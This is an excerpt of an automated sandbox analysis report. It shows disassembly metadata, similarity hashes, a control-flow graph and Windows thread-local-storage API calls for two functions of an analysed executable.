                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCloseHandleWait
                                                                            • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                            • API String ID: 592885855-1431102515
                                                                            • Opcode ID: 3f1f1d019ef3de2486efc8cdb2cebfce7d5ed4f9e7f3ec03ad90291dc173bf86
                                                                            • Instruction ID: c080cbc79931cdfed8187177e1a0c6226c6bd30a890e12db0226d09c030f8afa
                                                                            • Opcode Fuzzy Hash: 3f1f1d019ef3de2486efc8cdb2cebfce7d5ed4f9e7f3ec03ad90291dc173bf86
                                                                            • Instruction Fuzzy Hash: 17410F7AD002098BDB2ADFA8DC40BAEBFB5FF49328F540219E924673C1D7716905CB90
                                                                            Function 011A3BC0 Relevance: 5.1, APIs: 4, Instructions: 117COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 470 11a3bc0-11a3bc8 471 11a3c58-11a3c62 call 12e6800 470->471 472 11a3bce 470->472 474 11a3bcf-11a3bd9 TlsGetValue 471->474 472->474 476 11a3bdb-11a3bdf 474->476 477 11a3be6-11a3bed 474->477 476->477 478 11a3be1-11a3be5 476->478 479 11a3bef 477->479 480 11a3c67-11a3c71 call 12e6800 477->480 482 11a3bf0-11a3bfa TlsGetValue 479->482 480->482 484 11a3bfc-11a3c00 482->484 485 11a3c54-11a3c57 482->485 486 11a3c3d-11a3c53 484->486 487 11a3c02-11a3c1a call fb1220 484->487 490 11a3c1c-11a3c32 487->490 491 11a3c82-11a3ce7 call 12dbae0 487->491 493 11a3c76-11a3c80 call 12e6800 490->493 494 11a3c34 490->494 500 11a3d09-11a3d19 491->500 501 11a3ce9-11a3ced 491->501 497 11a3c35-11a3c37 TlsSetValue 493->497 494->497 497->486 502 11a3cef-11a3cf2 501->502 503 11a3cf4-11a3cf7 501->503 504 11a3cfa-11a3d03 HeapFree 502->504 503->504 504->500
                                                                            APIs
                                                                            • TlsGetValue.KERNEL32(00000000,?,011BEB80), ref: 011A3BD0
                                                                            • TlsGetValue.KERNEL32(00000000,?,011BEB80), ref: 011A3BF1
                                                                            • TlsSetValue.KERNEL32(00000000,00000000,?,011BEB80), ref: 011A3C37
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: Value
                                                                            • String ID:
                                                                            • API String ID: 3702945584-0
                                                                            • Opcode ID: d0d2ee32e8d80ab474222de63067bce7218db3f98d4cb35701a4cb1e4b0f6c70
                                                                            • Instruction ID: 47e348035b4496797b4866076554fa3c11d0e04c2fc7dd8e46a8ad3effe27c7b
                                                                            • Opcode Fuzzy Hash: d0d2ee32e8d80ab474222de63067bce7218db3f98d4cb35701a4cb1e4b0f6c70
                                                                            • Instruction Fuzzy Hash: 6F31F4B45103098FEB28DF69E80C7AABFF5FB04350F85841AE915DB294C338D844CBA1